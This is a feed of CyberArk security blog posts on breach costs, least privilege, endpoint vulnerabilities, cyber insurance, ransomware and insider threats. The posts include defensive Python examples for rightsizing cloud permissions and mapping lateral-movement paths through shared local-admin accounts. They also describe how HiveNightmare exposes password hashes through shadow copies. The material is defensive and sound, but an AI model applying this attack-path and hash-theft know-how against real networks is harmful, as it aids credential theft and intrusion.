With time on the attacker’s side — coupled with the fact that 82% of surveyed individuals admit to reusing credentials and passwords across accounts — just think how easy it is for an attacker to unlock a “door” on-premises or in the cloud, then move laterally and escalate privileges across a hybrid environment to reach their goals. For instance, by compromising one over-permissioned cloud identity through credential theft, a bad actor could compromise critical infrastructure or escalate their privileges to steal cloud-hosted data or disrupt high-value applications.

2. Attackers covet sensitive customer PII data

There are many ways of measuring cost-of-breach damages. Some forms of data loss are costlier to remediate when compromised, so defenders must be cognizant of which sensitive assets to prioritize to minimize damage. For instance, the loss of customer personally identifiable information (PII) was the most expensive compared to other types of data, at $180 per lost or stolen record versus an overall average of $161 per record.

3. On-premises-to-cloud and cloud-to-cloud migrations require careful planning

The study found that companies experiencing a breach during a cloud migration project faced an average of 18.8% higher costs. Whether you’re migrating data, applications or systems from an on-premises datacenter to the cloud, or you’re shifting workloads from one public cloud provider to another, don’t rush the process or cut security corners. From investing in monitoring to implementing least privilege access, careful preparation for a safe and secure transition is a must.

4. Automate everywhere to scale cloud defenses and save on costs

Attackers are using automation to pinpoint identity-related vulnerabilities in cloud environments, especially overly permissive resource misconfigurations and over-permissioned identities — to get more done without much effort. Security teams that are scaling defenses to fight automation with automation are finding success: organizations that have adopted artificial intelligence (AI), security analytics and encryption have saved between $1.25 million and $1.49 million compared to those who did not have significant usage of these tools. The study found about 65% of companies are partially or fully deploying automation within their security environments, compared to 52% two years ago.

5. Minimize data breach impact by consistently enforcing least privilege

The good news is more companies are getting on board with modern Identity Security tactics, such as AI-powered threat detection, behavioral analytics and the adoption of Zero Trust models. Companies with a mature Zero Trust strategy had an average data breach cost of $3.28 million, $1.76 million lower than those without one. This “trust nothing; verify everything” philosophy is also helping companies address one of the top-cited cloud security challenges today: the countless identities with misconfigured or unused cloud Identity and Access Management (IAM) permissions hidden throughout hybrid cloud environments.

As organizations rapidly scale cloud deployments and adopt advanced services to digitally transform their business, the creation of human, application and machine identities is accelerating. Access permissions for these identities are often granted based on group or role, resulting in too many identities having unused or unnecessary permissions. By continuously comparing what each identity is granted with what it has actually used (with or without AI-powered monitoring and detection on top), companies can consistently enforce least privilege principles across their hybrid cloud environments by removing excessive permissions, significantly reducing risk and improving overall visibility and security.
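The core of that “granted versus used” comparison is a set difference over an audit log, and it is worth seeing the mechanics before buying tooling that wraps them. The block below is an added example for this page, not CyberArk or IBM code; the identities, the granted action patterns and the CloudTrail-style log lines are constructed, the 90-day lookback is an assumed review window, and the service:Action naming with `*` wildcards is borrowed from the AWS IAM convention only as a shape.

```python
from __future__ import annotations
from datetime import datetime, timedelta, timezone
from fnmatch import fnmatchcase

LOOKBACK = timedelta(days=90)  # assumed review window

# Constructed inventory of what each identity is currently allowed to do.
GRANTED = {
    "svc-billing": ["s3:GetObject", "s3:PutObject", "s3:DeleteBucket", "kms:Decrypt"],
    "ci-deployer": ["ec2:*", "iam:PassRole"],
    "legacy-etl": ["rds:*"],
}

# Constructed audit-log lines, one successful API call per line:
# <identity> <action> <UTC timestamp>
ACCESS_LOG = """\
svc-billing s3:GetObject 2021-09-20T10:00:00+00:00
svc-billing kms:Decrypt 2021-09-20T10:00:01+00:00
svc-billing s3:PutObject 2021-02-01T08:30:00+00:00
ci-deployer ec2:RunInstances 2021-09-23T02:15:00+00:00
ci-deployer ec2:DescribeInstances 2021-09-23T02:15:05+00:00
ci-deployer iam:PassRole 2021-09-23T02:15:06+00:00
"""

# Fixed "now" so the example is reproducible (the post's publication date).
NOW = datetime(2021, 9, 24, tzinfo=timezone.utc)


def parse_log(text: str) -> list[tuple[str, str, datetime]]:
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        identity, action, ts = line.split()
        events.append((identity, action, datetime.fromisoformat(ts)))
    return events


def used_actions(events, identity: str, now: datetime) -> set[str]:
    """Actions the identity successfully invoked inside the lookback window."""
    cutoff = now - LOOKBACK
    return {action for who, action, ts in events if who == identity and ts >= cutoff}


def rightsize(granted: dict[str, list[str]], events, now: datetime) -> dict[str, dict]:
    """For each identity: actions to keep, explicit grants to remove, wildcards to
    narrow, and whether the identity is dormant (no activity at all)."""
    report = {}
    for identity, allowed in granted.items():
        used = used_actions(events, identity, now)
        # Keep only usage the current policy actually permits; anything else would
        # have come through a different policy path and is out of scope here.
        keep = sorted(a for a in used if any(fnmatchcase(a, pat) for pat in allowed))
        explicit = [p for p in allowed if "*" not in p]
        report[identity] = {
            "keep": keep,
            "remove": sorted(p for p in explicit if p not in used),
            "narrow": sorted(p for p in allowed if "*" in p),  # replace with the 'keep' list
            "dormant": not used,
        }
    return report


def to_policy_statement(identity: str, finding: dict) -> dict:
    """Least-privilege replacement grant in an IAM-style statement shape.
    Scoping 'Resource' to specific ARNs is the next tightening step, left out here."""
    return {"Sid": f"Rightsized-{identity}", "Effect": "Allow", "Action": finding["keep"]}


if __name__ == "__main__":
    report = rightsize(GRANTED, parse_log(ACCESS_LOG), NOW)
    for identity, finding in report.items():
        flag = "DORMANT " if finding["dormant"] else ""
        print(f"{flag}{identity}: keep={finding['keep']} remove={finding['remove']} narrow={finding['narrow']}")
        print("   ->", to_policy_statement(identity, finding))
```

Two findings in the constructed data are the ones that matter in practice: `svc-billing` keeps a `s3:DeleteBucket` grant it has never exercised, and `legacy-etl` has a wildcard grant and no activity at all, which is the profile of an identity that should be disabled rather than trimmed. A wildcard that is in use (`ec2:*`) is not removed but replaced by the explicit list of what was observed, which is exactly the manual step that is tedious at scale and why the report recommends automating it.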

The Zero Trust Bottom Line

Assume your enterprise has been breached. Period. The IBM report points out that it may take months to discover. At CyberArk, we believe a comprehensive least privilege, Zero Trust approach can help close that window and minimize an attack’s “blast radius” by unmasking attackers quickly and stopping them from accessing hybrid cloud resources. Applying modern security tactics like AI and automation can also cut time-to-detection significantly and reduce breach costs.

One final set of numbers: The IBM study broke down the average breach cost of $4.24 million into four categories: lost business ($1.59 million), detection and escalation costs ($1.24 million), post-breach response ($1.14 million) and notification ($0.27 million).

With average breach costs running 10 to 20% higher than the costs suffered by companies with Zero Trust strategies, can organizations really afford the price of inaction? Don’t wait to find out. By positioning identity at the heart of your security strategy, your organization can move forward with confidence, knowing your most critical assets are secure.


]]>
Find CyberArk at these DevSecOps Fall 2021 Events https://www.cyberark.com/blog/find-cyberark-at-these-devsecops-fall-2021-events/ Wed, 22 Sep 2021 14:34:54 +0000 https://www.cyberark.com/?p=123100 Find CyberArk at these DevSecOps Fall 2021 Events

Applications, as well as the tools and automated processes throughout the DevOps pipeline, are increasingly targets for sophisticated digital supply chain attackers. But with the right tools and strategy in place, security teams can partner with developers to establish agile, secure and productive supply chains and dev environments.

Over the next several weeks, the CyberArk team will be meeting with DevOps and security leaders around the globe — both virtually and in person — to explore DevSecOps approaches that mitigate risk and uncertainty without slowing velocity because no team should ever have to sacrifice security to ship features faster. Here’s where you can find us this fall:

CloudBees’ DevOpsWorld: September 28-30, 2021

We’re proud to sponsor DevOpsWorld 2021, hosted by CloudBees, where thousands of practitioners, developers and community members will come together virtually to shape the future of software delivery. Register for free and don’t miss these CyberArk sessions:

  • Securing Jenkins Pipeline with CyberArk Conjur Secrets Manager. A secure DevOps pipeline is possible — in fact, it’s easier than you might think. On Sept. 28 at 2:30 p.m. EDT, CyberArk DevOps Security Advisor Jody Hunt will lead this 90-minute workshop, exploring practical guidance on making Jenkins and CloudBees pipelines more secure, removing secrets from code and securing DevOps and automation tools.
  • Securing Jenkins Pipelines in Mission-Critical R&D Environments. Secure Jenkins pipelines are a must for mission-critical R&D pipelines. In this on-demand session, CyberArk Director of R&D Eran Koifman will outline ways to secure Jenkins pipelines to prevent code injection, how to establish policies to segment code bases while effectively balancing security and productivity and best practices based on real-world case studies.
  • 5 Ways to Secure Jenkins — You Won’t Believe #3! CyberArk DevOps Security Engineer Joe Garcia will outline five ways to bolster Jenkins security — for free. He’ll also share tips on working with security, scoped at the global, folder or job level, and how to introduce stronger security to freestyle jobs. You can catch his talk on Sept. 29 at 4:00 p.m. EDT and again on Sept. 30 at 7:00 a.m. EDT.

Red Hat AnsibleFest: September 29-30, 2021

Organizations around the world use Ansible and CyberArk’s integrated solutions to streamline the rotation and management of secrets and privileged credentials and automate the prevention and remediation of high-risk activities. Register and learn how during the AnsibleFest 2021 virtual experience.

On Sept. 30 at 12:00 p.m. EDT, Joe Garcia and co-presenter Roland Wolters, principal technical marketing manager at Isovalent, will present “Red Hat + CyberArk: A Reference Architecture for Securing Ansible Automation & CI/CD Pipelines.” They’ll explore the Red Hat Ansible Automation Platform and CyberArk reference architecture, elaborate on best practices used by organizations for layering security into their automation platforms and share proven tips for avoiding potential pitfalls along the way.

KubeCon and CloudNativeCon: October 11-15, 2021

Kubernetes and other cloud native technologies enable higher-velocity software development at a lower cost than traditional infrastructure. Cloud native — orchestrating containers as part of a microservices architecture — is a departure from traditional application design. Whether you’re heading to Los Angeles or tuning in from your home office, there’s much to discover about securing secrets in this new terrain.

During the event, check out a demo to see how Conjur Secrets Manager Enterprise and Open Source editions make it easier for developers to secure apps running in Kubernetes environments.

Connect with CyberArk at one of these upcoming DevSecOps events, or contact us directly to discover secure, simplified ways to unleash DevOps agility and scalability. By taking a proactive approach to security, leveraging automation and programmability and encouraging cooperation among teams, organizations can accelerate the pace of innovation while meeting compliance with corporate security mandates.

]]>
Don’t Let Cybersecurity Cracks Become Major Breaches https://www.cyberark.com/blog/dont-let-cybersecurity-cracks-become-major-breaches/ Fri, 17 Sep 2021 20:41:54 +0000 https://www.cyberark.com/?p=123020 Don’t Let Cybersecurity Cracks Become Major Breaches

Many major cybersecurity breaches can be traced back to the tiniest flaw. But as zero-day exploitations continue to make headlines and new vulnerabilities enter the National Vulnerability Database (NVD) almost daily, it’s often hard for security teams to seal the cracks and fix the bugs fast enough (not to mention address hidden issues they don’t even know about).

It’s a lot like owning an old house. Something always seems to be breaking or leaking, and even the most industrious do-it-yourselfer can quickly become overwhelmed by their growing to-do lists. With limited time, resources or know-how, homeowners tend to focus on the “big stuff” — replacing the washing machine that suddenly dies or calling emergency pest services after a mouse skitters across the kitchen floor.

But putting off or ignoring tiny issues, like the ones in this house, can lead to major headaches down the road … and sometimes, much sooner than you’d expect.


Window Cracks

You think your kids were just playing baseball and accidentally broke a window. Little do you know there’s an invisible structural shift taking place underground that’s creating undue pressure on all your windows and threatening every glass entry point into the house.

Malicious code execution can be a lot like that shift in pressure. For example, what first shipped as a routine Patch Tuesday fix for a local privilege escalation in the Windows Print Spooler service quickly morphed into a critical remote code execution and privilege escalation problem once researchers showed the fix could be bypassed. Today, there are several known variants of this security issue, collectively known as “PrintNightmare.” Once these vulnerabilities are exploited, the “glass” breaks the moment the attacker obtains SYSTEM on the host.

Recent reports indicate ransomware attackers are riding the PrintNightmare wave, taking advantage of unpatched networks to gain SYSTEM, encrypt files and demand ransom payments. Until every host is patched, the practical mitigation is to stop the Print Spooler service on machines that do not need to print (domain controllers first) and to restrict inbound remote printing through Group Policy.

Flickering Lights 

Your lights just flickered suddenly. But you shrug it off, figuring you just haven’t changed the bulbs in a while. What’s actually happening is far more serious: Your home’s wiring is inadequate, and you’ll soon be facing a hefty bill from your electrician.

These flickering lights are akin to HiveNightmare, also known as SeriousSAM, a local privilege escalation vulnerability in which overly permissive access control lists on the SAM, SYSTEM and SECURITY registry hive files let any local user read them. The live files are locked by the operating system, but copies of them inside a Volume Shadow Copy are not, so an unprivileged user can lift password hashes and machine secrets from the shadow copy. While you may just see “flickering lights” from time to time, small stealthy changes are happening in your fuse box — which can eventually lead to an overload or meltdown.

An attacker who successfully exploited this zero-day vulnerability could “run arbitrary code with SYSTEM privileges” and then “install programs; view, change or delete data; or create new accounts with full user rights,” according to Microsoft. The company’s guidance makes clear that fixing the ACLs on the live files is not enough on its own: shadow copies created before the fix still carry the old, readable hive files, so existing shadow copies (and system restore points) must be deleted as well and a fresh restore point created afterwards. A quick check for an endpoint is whether BUILTIN\Users has read access on %windir%\system32\config\SAM and whether any shadow copies predating the fix still exist.

Slow Drainage

What you think is just a pesky shower clog is really a major issue across your entire main sewer line. Yet you pour in some drain cleaner and get back to your day.

It’s like the unknown vulnerability within Kaseya’s IT management software that was first exploited to ignite the far-reaching REvil ransomware supply chain attacks. Attackers reportedly compromised Kaseya’s Virtual System Administrator (VSA) solution, which is used to remotely monitor and manage endpoints and servers. With control over SaaS and on-premises Kaseya VSA servers — along with other MSP-managed on-premises servers — the threat actors pushed a phony software update containing the ransomware, ultimately infecting dozens of MSPs and, through them, an estimated 1,500 downstream businesses.

Water Damage

You notice something that looks like water damage in your basement, but the area is completely dry. You can’t seem to find the source of the leak. What you don’t realize is that a termite colony has been thriving under your floorboards, behind your walls and in your basement … for several years.

Cloud Hopper, a multi-year cyber invasion that targeted the world’s largest technology and cloud service providers and their customers, began by compromising one single endpoint. For one victim organization, the attack cycle continued for at least five years as attackers leveraged automation and privileges of trusted services to distribute malware and worm deeper into systems — without raising red flags.

Protect Your House with Defense-In-Depth Starting at the Endpoint 

Maintaining a safe and secure property is an ongoing labor of love and as any seasoned homeowner understands, it requires a whole toolbox and reliable network of experts to help with the heavy lifting.

The same goes for cybersecurity: Protecting your organization is an ongoing effort, not a box to check off, and the most effective approach involves multiple tools working together. Comprehensive endpoint security strategies often comprise endpoint detection and response (EDR), next-generation anti-virus (NGAV), Privileged Access Management, and application and operating system patching tools and best practices.

Cyber attackers look for tiny cracks — often on the endpoint — to penetrate your IT estate and gain an initial foothold. From there, they cleverly perform reconnaissance and avoid detection to either steal data, take down critical applications and infrastructure — or pursue whatever their end game is. What starts as a seemingly insignificant security event can end in a major breach that brings the business to its knees. These endpoint-originated attacks can disrupt your business, damage your company’s reputation and lead to steep regulatory fines. Yet just like homeowners who put off seemingly “minor” issues, many organizations underestimate their endpoint security risks, leaving the door wide open for attackers. By maximizing your endpoint security posture with a layered security approach, your organization can reduce risk and uncertainty and protect your digital “house.”

Interested in learning more? Defense-in-depth solutions such as CyberArk Endpoint Privilege Manager enforce privilege escalation and credential theft controls that help prevent attackers from gaining administrative access in your environment and getting their hands on your most valuable assets. Meanwhile, end-users can get temporary, on-demand access to the privileged resources they need without overburdening the IT help desk. This can also help protect against zero-day exploits and ransomware by restricting or blocking suspicious applications. And if an endpoint device hasn’t been adequately patched against a vulnerability like PrintNightmare, policies are dynamically implemented to stop the vulnerable software from executing. Learn more about CyberArk Endpoint Privilege Manager or request a free trial today.

]]>
Cyber Insurance: How to Meet Requirements, Save Money and Reduce Risk https://www.cyberark.com/blog/cyber-insurance-how-to-meet-requirements-save-money-and-reduce-risk/ Tue, 14 Sep 2021 20:35:54 +0000 https://www.cyberark.com/?p=122984 Cyber Insurance: How to Meet Requirements, Save Money and Reduce Risk

As the average cost of a data breach reaches a record high of $4.24 million, one successful zero-day exploit or ransomware attack has the potential to take down a business completely. Having cyber insurance, or cyber liability insurance coverage (CLIC), in place is an integral piece of a proactive risk mitigation strategy. And while it can’t protect your organization’s most valuable data and systems, a cyber insurance policy can help minimize post-incident business disruption, speed recovery efforts and curb related costs to your organization — and in some cases, impacted partners and customers downstream.

Cyber Insurance: A Hefty Price Tag for Peace of Mind and a “Sure Thing” No Longer

During the unprecedented year that was 2020, the share of enterprises electing to adopt new cyber insurance policies nearly doubled, from 26% to 47%, according to the U.S. Government Accountability Office (GAO). It only takes a handful of high-profile attacks to wipe out the billions generated in premiums by cyber insurance companies: payouts for recent attacks have been so large that providers have seen direct-loss ratios on standalone policies climb sharply. As pandemic-driven cyber risks persist, demand continues to grow.

In response to these market changes, insurance premiums have risen sharply across the board. Underwriting standards, policy terms and payout conditions are also getting much stricter — in some cases, limits are being slashed in half. Last month, Reuters reported that AIG has increased its pricing by nearly 40% globally, while implementing tighter terms to address increasing cyber loss trends.

Feeling the strain, some insurance brokers are refusing coverage altogether. After filling out a policy application or annual renewal questionnaire — once relatively easy steps to take — some organizations are being turned away flat out. The ones that are not turned away are seeing much more stringent pre-audit requirements, demanding a stronger security posture both in terms of controls and incident response plans. The inability to meet these new requirements can result in rate increases of up to 300%. Unless these organizations make immediate changes to step up their security controls — often within a 60-day window — they risk losing their existing coverage completely. The urgent need to roll out controls and demonstrate risk reduction quickly is driving many organizations to explore SaaS-delivered security solutions that provide rapid time-to-value.

Be Prepared: What to Expect When Applying for Cyber Insurance

Since the cyber insurance landscape is changing so rapidly, it’s important to understand the latest requirements and enter the process with eyes wide open. Here are some things you can expect, along with steps you can take to maximize coverage and minimize costs.

Whether your organization is considering cyber insurance for the first time or is up for a policy renewal, you’ll have to fill out a questionnaire about your existing cybersecurity tools, controls and processes. Your organization’s ultimate evaluation “score” helps the insurance broker quantify your level of risk and overall security posture. It’s a lot like buying health insurance: the “healthier” you are, the lower your rate is likely to be.

While each insurance broker’s evaluation process differs, there are certain security controls that are almost always required for an organization to obtain, and keep, cyber insurance coverage.

Such mandates often involve Identity and Access Management (IAM) controls and best practices in alignment with industry standards put forth by the Center for Internet Security, CISA and others.

For example, since many of today’s most damaging attacks stem from compromised privileged credentials, most carriers require Privileged Access Management (PAM) controls to protect privileged accounts — those that unlock access to high-value systems and data. Least privilege controls, for instance, may be required to strengthen ransomware defenses, protect sensitive data in cloud environments and address compliance concerns.

Insurers also want assurance that multi-factor authentication (MFA) is being utilized to bolster security and authenticate administrative access to those privileged accounts. Recent attacks have shown that if your authentication systems are protected by passwords alone, it’s not a question of if you’ll be compromised, but when. Failure to implement MFA elevates your risk level, and in turn, your premium rates. And in the age of hybrid work, insurers’ MFA requirements are extending to remote network access and remote email access as well. They are also increasing security requirements around privileged access for third-party vendors to minimize supply chain risk.

Leading Insurers Recognize CyberArk for Ability to Effectively Reduce Cybersecurity Risk

The insurance industry will continuously improve its approach to addressing the systemic nature of cyber risk. As part of this, insurers are coming together to help their customers navigate the cybersecurity marketplace and implement more effective tools and processes.

The Cyber Catalyst℠ program, created by Marsh, a global leader in insurance broking and risk management, this year recognized CyberArk for its ability to effectively reduce cybersecurity risk. CyberArk was the only Privileged Access Management vendor to receive this distinction — further validating the importance of PAM to an overall cybersecurity strategy, along with our security-first approach to delivering integrated authentication, authorization, access and audit along every step of the Identity Security lifecycle.

The program’s rigorous evaluation process involved participating insurers assessing the ability of cybersecurity solutions to address prominent risks including ransomware, supply chain and vendor management, cloud migration and management, social engineering, and privacy regulation and data management. In their evaluation of the CyberArk Identity Security Platform, the insurers had this to say:

  • “One of the best identity access management solutions and timely, given emerging regulatory concerns regarding visibility of data. Helps meet the requirement for improved control and oversight of access to data based on user role.”
  • “A comprehensive solution for privilege access management and simplifies the local admin access problem. Targets the key ways attacks happen and looks closely at unauthorized actions, rather than standard indicators of compromise.”

Privileged Access Management remains at the heart of a successful cybersecurity strategy, offering organizations the peace of mind that their most critical assets are protected.

Our industry-leading SaaS-delivered solutions can help your organization jump-start privilege-related risk reduction and realize rapid time-to-value. And if you’re currently focused on a “sprint” to close security gaps within the 60-day period to get — or keep — a cyber insurance policy, the CyberArk Blueprint outlines practical steps for implementing controls that help address the most urgent requirements in the shortest time possible. Adhering to incident response best practices recommended by leading authorities, this framework is designed to defend against three common moves nearly every attacker makes to steal data and disrupt systems, and to secure access to the most frequently targeted privileged accounts and identities.

Have specific questions or concerns about meeting cyber insurance requirements? Get in touch to learn how our team can help you prepare, potentially save on premiums, reduce risk and securely move your business forward.

Tune in! To dig deeper into the ins and outs of cybersecurity insurance, how recent cyber activity has impacted the market and more, listen to this episode of the CyberTalk with CyberArk podcast, featuring special guest Mark Camillo, CEO at CyberAcuView.
Ransomware Defense Best Practices https://www.cyberark.com/blog/4-ransomware-defense-best-practices/ Wed, 08 Sep 2021 21:06:43 +0000 https://www.cyberark.com/?p=122862 4 Ransomware Protection Steps

Ransomware has never been more prevalent — or profitable — than it is right now. What started as the exclusive domain of highly skilled and opportunistic bad actors has evolved into an underground industry in which virtually anyone can get their hands on pre-built tool kits and plans to launch ransomware attacks at an alarming pace.

Many businesses are searching for a “silver bullet” to prevent attacks and stay out of the headlines. But protecting against ransomware — and the repeat or double-extortion attacks that increasingly follow — is more of a mentality and posture than it is a particular set of tools.

Ransomware Attacks Have Increased By 151%

Much like an American football game where the defense must plan for everything an offense throws at them, IT and security teams must anticipate the many elements, angles and paths a ransomware attack can include.

Whether your organization has found itself in the unenviable position of charting a road to recovery, or if proactive protection is your aim, it’s important to keep these four things in mind when creating a defensive playbook. Following these steps can also help streamline processes for recovery and regaining trust in compromised environments:

1. Reframe your assumptions about cyber risk. Acknowledge that breaches will happen, given enough time. With this mindset, shifting to a defensive posture that focuses attention and resources squarely on proactively protecting mission-critical systems and educating users on cybersecurity fundamentals becomes easier to do. It will also streamline processes for recovery and regaining trust in compromised environments.

As in sports, it’s critical for security to stay agile, so you can quickly pivot and make changes — with the understanding that even with the best preventative controls in place, something could still slip through.

Ransomware Facts

2. Revoke admin rights across your environment. Breaching an endpoint and stealing privileged credentials on it — those that grant or have administrator rights — supercharges attackers’ ability to encrypt high-value data and hold it for ransom. Your playbook should emphasize protection of highly privileged systems by revoking admin rights from human users and applications and consistently enforcing least privilege — the lowest possible clearance level that allows the user to perform their role.

Mapping out the potential lateral movement routes an attacker might take — and ranking them in order of likelihood and severity — will drive a more systematic defensive approach. This can also help you ward off credential theft attempts, block ransomware with increased certainty and detect insider threats faster to minimize damage.
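The mapping exercise described above can be made systematic. The following is an added example, not code from the original post or from CyberArk: it takes a constructed inventory of which accounts hold local admin rights on which hosts, and which accounts currently have a live session on each host, then walks the classic shared-local-admin path (an owned host yields the accounts signed in there; any of those accounts that is a local admin elsewhere yields the next host). It finally scores each account by how many hosts fall out of reach if its standing admin rights are revoked everywhere, which gives a defensible order in which to remove admin rights first. Host names, account names and the `LOCAL_ADMINS` / `SESSIONS` structures are all assumptions made for the example.

```python
"""Rank standing local-admin rights by the lateral reach they give an attacker.

Added example for the 'map lateral movement routes' step. Model (assumed,
simplified): an attacker who controls host H can harvest the credentials of
every account with a live session on H; each harvested account that is a
local admin on host H' lets the attacker reach H'.
"""
from collections import deque

# Constructed sample inventory (not real data): host -> accounts in its local
# Administrators group.
LOCAL_ADMINS = {
    "WS-01": {"alice", "helpdesk"},
    "WS-02": {"bob", "helpdesk"},
    "WS-03": {"carol", "helpdesk"},
    "FS-01": {"svc-backup", "helpdesk"},
    "DC-01": {"svc-backup", "domadmin"},
}

# Constructed sample session data: host -> accounts currently signed in there
# (their credential material is assumed to be recoverable on that host).
SESSIONS = {
    "WS-01": {"alice", "helpdesk"},
    "WS-02": {"bob"},
    "WS-03": {"carol", "svc-backup"},
    "FS-01": {"svc-backup"},
    "DC-01": {"domadmin"},
}


def reachable_hosts(start, local_admins, sessions):
    """Breadth-first walk: owned host -> harvested accounts -> hosts they administer.

    Returns (set of reachable hosts, set of harvested accounts).
    """
    owned = {start}
    harvested = set()
    queue = deque([start])
    while queue:
        host = queue.popleft()
        for acct in sessions.get(host, ()):
            if acct in harvested:
                continue
            harvested.add(acct)
            for other, admins in local_admins.items():
                if acct in admins and other not in owned:
                    owned.add(other)
                    queue.append(other)
    return owned, harvested


def rank_admin_removals(start, local_admins, sessions):
    """Score each account by how many hosts become unreachable from `start`
    once its local-admin rights are revoked on every host. Highest score first;
    ties are broken alphabetically so the output is stable."""
    baseline, _ = reachable_hosts(start, local_admins, sessions)
    accounts = set().union(*local_admins.values())
    scores = {}
    for acct in accounts:
        trimmed = {h: admins - {acct} for h, admins in local_admins.items()}
        after, _ = reachable_hosts(start, trimmed, sessions)
        scores[acct] = len(baseline) - len(after)
    return sorted(scores.items(), key=lambda kv: (-kv[1], kv[0]))


if __name__ == "__main__":
    hosts, accts = reachable_hosts("WS-01", LOCAL_ADMINS, SESSIONS)
    print(f"From WS-01 an attacker can reach {len(hosts)} hosts via {len(accts)} accounts")
    for acct, score in rank_admin_removals("WS-01", LOCAL_ADMINS, SESSIONS):
        print(f"revoke admin rights of {acct:<11} -> {score} fewer hosts reachable")
```

In the constructed data, the shared `helpdesk` account is the one whose removal cuts reach the most, followed by the `svc-backup` service account that bridges a workstation to the domain controller; the per-user accounts score zero because they only administer the machine they sit on. The same ranking, applied to a real export of local group membership and session data, is what turns the "map and rank" advice into a concrete removal order.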

3. Run regular drills to test cybersecurity defenses. Of course, it’s impossible to anticipate every potential “play,” especially since ransomware attackers change tactics frequently. Instead, continuously test and reassess your security processes to determine whether certain connections, access rights and recovery processes align with your organizational goals. For example, validate whether connections to privileged access points follow the right protocols and limitations to address potential vulnerabilities or overlooked points of failure.

Working with an outside Red Team can help test existing security controls against common tactics, techniques and procedures (TTPs) to help dissuade future attacks. If you do suffer from a security event like a ransomware attack, incident response services are integral in identifying the scale of the attack, determining if any indicators of compromise (IOCs) remain in the environment and helping you minimize loss.

4. Ruin attackers’ plans. Just because you “assume breach” doesn’t mean you’re backing down. There are many strategies you can employ to make attackers wish they had gone elsewhere. For instance, you can reduce risk exposure by starting all network users and applications with standard accounts that have no admin rights and elevate applications requiring admin rights on an as-needed basis.

This will help shut down common attack vectors such as phishing campaigns, Remote Desktop Protocol (RDP) abuse and unauthorized local downloads.

This step can be supplemented by adding automated secrets and credentials management on critical targets to stop attackers from using stolen tokens or keys to access high-value data and monitoring network activity for suspicious behaviors.

Attacks on the endpoint are virtually constant, and it’s clear that some will succeed. Yet, it’s what happens next that determines whether the attack truly alters the score or simply winds up a fumble.

A winning ransomware defense playbook will consider — and can intercept — ransomware attempts at every point along the attack chain by embracing the right mindset, a defense-in-depth approach that layers preventative controls and detective mechanisms and the in-depth expertise needed to keep out of harm’s way and stay in the game.
The Cybersecurity Insider Threat “Among Us” https://www.cyberark.com/blog/the-cybersecurity-insider-threat-among-us/ Thu, 02 Sep 2021 17:50:02 +0000 https://www.cyberark.com/?p=122745 The Cybersecurity Insider Threat “Among Us”

Although created a few years before the world went into lockdown, something about the simple app-based game Among Us* truly tapped into the pandemic zeitgeist like nothing else. On the one hand, it was a community-based game that worked perfectly in our new Zoom-based reality — while on the other, it tapped into the mounting dread that we were becoming more disconnected from other people. We were seeing images that looked and sounded like our friends, coworkers and classmates, but how could we know for sure? Were the people connecting to corporate resources and collaboration applications really who they said they were? And were they there to do what they said they were there to do? The whole thing was, to borrow the game’s own slang, “kinda sus.”

For those who don’t know, Among Us is like the old board game Clue remixed with a paranoid 1970s sci-fi film like Alien and adapted for the digital age. You play a crew member on a space vessel and dress in a spacesuit that’s identical to everyone else’s except for its unique color. You all go about the tasks of maintaining the vessel, but one or more of the crew members are imposters who are stealthily taking out their colleagues. Players must look for and debate clues and suspicious behavior to determine the guilty party. If the true imposter is ejected, everyone wins. If not, they all go back to square one.

Those in the cybersecurity space may not find Among Us to be exactly escapist, considering they play a real-life, high-stakes version of this game every single day. It’s one thing to deny access to a hostile party trying to pose as an authorized user, but it’s quite another to pinpoint a malicious agent who has every right to be in your system.

Insider Threats by the Numbers

The Ponemon Institute’s 2020 Cost of Insider Threats report found the average global cost of insider threats rose by 31% in two years to $11.45 million, while the number of total incidents nearly doubled (rose 47%) in the same time period.

The study explored three primary insider threat profiles: negligent insiders (those who unintentionally cause issues), criminal and malicious insiders (those who intentionally cause damage) and credential thieves (those who target login information to gain unauthorized access to applications and systems). Of these three profiles, the study found credential thieves cost organizations an average of $871,000 per incident — three times the cost of a negligence-driven incident. While most insider threats were non-malicious, accidental flubs, they represented a key vulnerability — and resource drain.

Meanwhile, the 2021 Verizon Data Breach Investigations Report (DBIR) found that 99% of incidents classified under the “privilege misuse” category were driven by internal actors. As the report states, “This pattern is an uncomfortable one — this is where the people we trust betray us.” The DBIR found financial gain to be the most common motivator at 67%, yet it revealed several other drivers: fun (17%), a grudge against the employer (14%), espionage (9%), convenience (3%) and ideology (1%).

The insider threat is very real, very hard to spot and makes balancing efficient daily workflows and stringent, always-on security a real challenge. It’s all fun and games until you find yourself alone in the electrical bay with an imposter — figuratively and/or literally, as the case may be.

The Insider Security Conundrum

Ironically (or not), one of Among Us imposters’ more popular “kill zones” is in the vessel’s security room. While crew members are in the room surveilling other areas via security cams, they can’t see what’s happening right behind them.

Working undercover is precisely how insider threats operate, and it’s what makes them so difficult for cybersecurity experts. By focusing on keeping the bad guys out, it’s easy to miss what’s right over your own shoulder. And these threat actors have a leg up — the most crucial thing outside attackers are looking to acquire is something that insiders already have, and that’s legitimate access. Using stolen credentials from other corporate identities, insiders can easily move throughout systems, elevating their access and worming further into privileged systems to steal data or use it in ways they shouldn’t.

Before devising a strategy for shoring up security measures against threats in your own house, it’s important to consider where this responsibility ultimately falls. Is it solely the purview of the info security teams? Or do HR and legal bear some responsibility since insider threats track back to hiring and potential employee vetting? The answer, like so much involved in the digital world, is the more communication and cooperation you have between departments and leadership, the better equipped you will be to uncover and mitigate threats from within. To revisit our Among Us analogy, the fewer dark rooms and unmonitored pathways you have, the less likely malicious actors will be able to move about undetected. Shining those lights is vital.

No Trust, No Sus

The rise of remote and hybrid work, cloud usage and increased reliance on alternate means of employee connection — the very elements that helped fuel the popularity of communal games like Among Us — has caused the scope and consequences of insider threats to explode.

In this new reality, you can’t simply separate the “good” guys from the “bad” guys because they often look alike. What’s more, sometimes a person will start out as one and eventually become the other. The solution is to trust no one until you can continuously verify that they are who they say they are. This means there are no darkened rooms, no hidden vents and far less uncertainty that when someone unlocks and enters a specific “room,” they are there to do their assigned task and nothing else.

This “Zero Trust” approach for every type of identity — human insiders, human outsiders, machine users, applications and even devices — goes a long way in proactively managing insider threats by limiting disruption, strengthening security resilience and protecting resources — particularly in hybrid cloud environments. The threat may be coming from inside the house, but the security measures in place go well beyond a few doors and walls.

Zero Trust would make Among Us far less fun to play for sure, but it makes operating in our new boundary-less world a whole lot safer. Tricking your friends with casual sabotage can be fun when it’s a game, but it’s much less so when millions of dollars and reams of sensitive data are at stake.

*Among Us is created and distributed by InnerSloth LLC

